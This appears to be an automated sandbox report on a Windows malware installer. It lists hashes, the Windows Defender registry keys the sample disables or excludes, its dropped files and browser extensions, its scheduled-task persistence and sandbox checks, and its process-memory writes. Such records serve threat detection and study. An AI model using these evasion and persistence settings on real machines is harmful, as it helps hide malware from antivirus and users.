Analysis
-
max time kernel
151s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
27-10-2022 11:35
Static task
static1
Behavioral task
behavioral1
Sample
984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe
Resource
win7-20220901-en
General
-
Target
984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe
-
Size
7.3MB
-
MD5
ec35db0e02bd0e18a017a52441ec54cc
-
SHA1
d4d01571c105471d3709eeb3f189fef85bbaf34c
-
SHA256
984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc
-
SHA512
44eb1553ac9f874b7f04bf9d4d71f9bb3c2dd0927e357ead4b420d4dc26b01224ba8260d324d4362048192db449184527c6f783542cbdf118eba3b5866f4fa42
-
SSDEEP
196608:91OYDOuTSfePzjgvuriRwpgaV6fyAYTpSHCPiTEqbDu62WWjYh:3ODuTEOjgvuO2B6qyyWEqoWB
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nCvDbzSfnWcpLPar = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nCvDbzSfnWcpLPar = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KAzPppVjngGU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\iYAYiDbRBZchqqVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LwwnfqzUtnUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tEUgboViOVXhC = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nCvDbzSfnWcpLPar = "0" schtasks.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\nCvDbzSfnWcpLPar = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CmszfUlKU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LwwnfqzUtnUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\iYAYiDbRBZchqqVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\nSsQRaKrrRPLzDjLR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CmszfUlKU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KAzPppVjngGU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tEUgboViOVXhC = "0" conhost.exe -
Executes dropped EXE 4 IoCs
pid Process 856 Install.exe 388 Install.exe 820 JrcEnZk.exe 1908 vpNprnR.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation vpNprnR.exe -
Loads dropped DLL 12 IoCs
pid Process 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 856 Install.exe 856 Install.exe 856 Install.exe 856 Install.exe 388 Install.exe 388 Install.exe 388 Install.exe 1644 rundll32.exe 1644 rundll32.exe 1644 rundll32.exe 1644 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json vpNprnR.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json vpNprnR.exe -
Drops file in System32 directory 22 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini JrcEnZk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vpNprnR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 vpNprnR.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 vpNprnR.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 vpNprnR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 vpNprnR.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol JrcEnZk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 vpNprnR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol JrcEnZk.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\CmszfUlKU\wDfClg.dll vpNprnR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vpNprnR.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak vpNprnR.exe File created C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\vsdblIv.dll vpNprnR.exe File created C:\Program Files (x86)\tEUgboViOVXhC\BeaqFzK.xml vpNprnR.exe File created C:\Program Files (x86)\NBAnxdAYyVuYrJIDKcR\OOpFgow.xml vpNprnR.exe File created C:\Program Files (x86)\tEUgboViOVXhC\pRTCdfd.dll vpNprnR.exe File created C:\Program Files (x86)\LwwnfqzUtnUn\tejDvXf.dll vpNprnR.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi vpNprnR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja vpNprnR.exe File created C:\Program Files (x86)\CmszfUlKU\qSPyLqj.xml vpNprnR.exe File created C:\Program Files (x86)\KAzPppVjngGU2\kwZDlfoCzlIgm.dll vpNprnR.exe File created C:\Program Files (x86)\KAzPppVjngGU2\TlkJuQP.xml vpNprnR.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bvaTKsBBalfzetbIqS.job schtasks.exe File created C:\Windows\Tasks\pWRoRRufbcBSXnZTh.job schtasks.exe File created C:\Windows\Tasks\KkeCdiUIdtvoEjB.job schtasks.exe File created C:\Windows\Tasks\DzcOFfJcFiDtUecWi.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2004 schtasks.exe 1536 schtasks.exe 1988 schtasks.exe 1536 schtasks.exe 1268 schtasks.exe 524 schtasks.exe 1036 schtasks.exe 1228 schtasks.exe 292 schtasks.exe 852 schtasks.exe 320 schtasks.exe 1736 schtasks.exe 1424 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-13-c5-d2-84-f1\WpadDecisionReason = "1" vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1F62EE11-7320-4D6A-9678-A8BDAEB4E85C}\WpadDecision = "0" vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed vpNprnR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1F62EE11-7320-4D6A-9678-A8BDAEB4E85C}\WpadDecisionReason = "1" vpNprnR.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-13-c5-d2-84-f1\WpadDecisionTime = c0aeb596f8e9d801 vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\c6-13-c5-d2-84-f1\WpadDecision = "0" vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1F62EE11-7320-4D6A-9678-A8BDAEB4E85C}\c6-13-c5-d2-84-f1 vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs vpNprnR.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs vpNprnR.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections vpNprnR.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1F62EE11-7320-4D6A-9678-A8BDAEB4E85C}\WpadNetworkName = "Network 2" vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1F62EE11-7320-4D6A-9678-A8BDAEB4E85C} vpNprnR.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{1F62EE11-7320-4D6A-9678-A8BDAEB4E85C}\WpadDecisionTime = c0aeb596f8e9d801 vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates vpNprnR.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs vpNprnR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs vpNprnR.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 vpNprnR.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde vpNprnR.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 984 powershell.EXE 984 powershell.EXE 984 powershell.EXE 396 powershell.EXE 396 powershell.EXE 396 powershell.EXE 1584 powershell.EXE 1584 powershell.EXE 1584 powershell.EXE 1584 powershell.EXE 1584 powershell.EXE 1584 powershell.EXE 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe 1908 vpNprnR.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 984 powershell.EXE Token: SeDebugPrivilege 396 powershell.EXE Token: SeDebugPrivilege 1584 powershell.EXE Token: SeDebugPrivilege 1584 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 620 wrote to memory of 856 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 27 PID 620 wrote to memory of 856 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 27 PID 620 wrote to memory of 856 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 27 PID 620 wrote to memory of 856 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 27 PID 620 wrote to memory of 856 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 27 PID 620 wrote to memory of 856 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 27 PID 620 wrote to memory of 856 620 984f3960c7a02abafb1bb502406a2e053bba3d5ec1ad1a432e1dbd728a36efcc.exe 27 PID 856 wrote to memory of 388 856 Install.exe 28 PID 856 wrote to memory of 388 856 Install.exe 28 PID 856 wrote to memory of 388 856 Install.exe 28 PID 856 wrote to memory of 388 856 Install.exe 28 PID 856 wrote to memory of 388 856 Install.exe 28 PID 856 wrote to memory of 388 856 Install.exe 28 PID 856 wrote to memory of 388 856 Install.exe 28 PID 388 wrote to memory of 1120 388 Install.exe 30 PID 388 wrote to memory of 1120 388 Install.exe 30 PID 388 wrote to memory of 1120 388 Install.exe 30 PID 388 wrote to memory of 1120 388 Install.exe 30 PID 388 wrote to memory of 1120 388 Install.exe 30 PID 388 wrote to memory of 1120 388 Install.exe 30 PID 388 wrote to memory of 1120 388 Install.exe 30 PID 388 wrote to memory of 1888 388 Install.exe 32 PID 388 wrote to memory of 1888 388 Install.exe 32 PID 388 wrote to memory of 1888 388 Install.exe 32 PID 388 wrote to memory of 1888 388 Install.exe 32 PID 388 wrote to memory of 1888 388 Install.exe 32 PID 388 wrote to memory of 1888 388 Install.exe 32 PID 388 wrote to memory of 1888 388 Install.exe 32 PID 1120 wrote to memory of 1320 1120 forfiles.exe 34 PID 1120 wrote to memory of 1320 1120 forfiles.exe 34 PID 1120 wrote to memory of 1320 1120 forfiles.exe 34 PID 1120 wrote to memory of 1320 1120 forfiles.exe 34 PID 1120 wrote to 